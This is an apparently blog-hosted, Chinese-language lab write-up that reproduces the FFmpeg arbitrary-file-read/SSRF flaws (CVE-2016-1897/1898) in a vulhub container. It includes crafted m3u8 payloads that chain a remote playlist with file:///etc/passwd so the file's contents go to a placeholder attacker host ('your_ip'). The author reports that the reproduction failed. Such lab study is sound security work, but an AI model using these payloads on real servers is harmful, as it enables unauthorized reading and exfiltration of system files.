ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)

漏洞描述

影响范围

  • FFmpeg 2.8.x < 2.8.5
  • FFmpeg 2.7.x < 2.7.5
  • FFmpeg 2.6.x < 2.6.7
  • FFmpeg 2.5.x < 2.5.10

漏洞环境及利用

搭建docker环境

访问8080端口看到上传界面

由于vulhub并没有讲述该漏洞如何复现,我们需要进入环境查看源码

<?php

if(!empty($_FILES)) {

filename = escapeshellarg(_FILES['file']['tmp_name']);

$newname = './' . uniqid() . '.mp4';

shell_exec("ffmpeg -i filename newname");

}

?>

可以看到就是调用了ffmpeg这个工具来处理文件

这是一个恶意请求的m3u8文件:

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

http://your_ip:9999/test.txt

#EXT-X-ENDLIST

文件格式如下:

#EXTM3U 标签是 m3u8 的文件头,开头必须要这一行

#EXT-X-MEDIA-SEQUENCE 表示每一个media URI 在 PlayList中只有唯一的序号,相邻之间序号+1

#EXTINF:10.0, 表示该一段 TS 流文件的长度

#EXT-X-ENDLIST 这个相当于文件结束符

这些是 m3u8 的最基本的标签,而问题就出在 FFMpeg 去请求 TS 流文件(URL)时,FFMpeg 不会判断里面的流地址,直接请求。所以我们可以试想,用FFMpeg内自带的concat函数,将一个不包含文件结束符的文件与file协议读取的文件衔接起来,请求回攻击机,就能够达到读取任意文件的效果!

漏洞复现

首先,我们需要在 web 服务器上创建一个 back.txt,文件内容是 m3u8 的格式,其中不包含文件结束符。

其次,我们再创建一个恶意的 m3u8 文件,文件内容通过 concat 拼接本地文件/etc/passwd。

最后,我们上传这个恶意的 m3u8 文件。

back.txt:

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:,

http://your_ip:9999/?

upload.m3u8:

#EXTM3U

#EXT-X-TARGETDURATION:6

#EXTINF:10.0,

concat:http://your_ip/back.txt|file:///etc/passwd

#EXT-X-ENDLIST

Tip: 以上的文件需要使用记事本编辑保存,选择默认 utf-8 格式。使用vim来编译可能会导致复现失败。

使用python来搭建一个简易的web,将back.txt部署到web上。

python2 -m SimpleHTTPServer 8888

python3 -m http.server 8888

上传恶意m3u8文件,并监听9999端口

复现失败了

相关推荐
金纬科技4 分钟前
陕煤集团-用什么-筑牢数据安全屏障、电脑加密软件那个最好用?
安全·电脑
清风6666662 小时前
基于单片机的汽车多参数安全检测与报警系统设计
单片机·安全·汽车·毕业设计·课程设计·期末大作业
catoop2 小时前
基于非对称算法的文件下载安全方案设计
安全
我科绝伦(Huanhuan Zhou)2 小时前
Redis 生产环境安全基线配置指南:从风险分析到实操加固
数据库·redis·安全
Bypass--2 小时前
《云原生安全攻防》-- K8s集群安全事件响应
安全·云原生·容器·kubernetes
众创五舟战神:l_e01204 小时前
速卖通测评自养号技术:搭建安全稳定账号体系,流量销量双突破
安全·测评自养号·速卖通测评·ip环境搭建·买家号注册下单·自养号测评技术·速卖通采购
jenchoi4134 小时前
【2025-11-05】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
深圳南柯电子12 小时前
深圳南柯电子|医疗电子EMC整改:助医疗器械安全稳定的关键环节
网络·人工智能·安全·互联网·实验室·emc
国科安芯14 小时前
多输出电压条件下同步整流效率测试与优化
网络·单片机·嵌入式硬件·安全
weixin_5377658015 小时前
【Nginx优化】性能调优与安全配置
运维·nginx·安全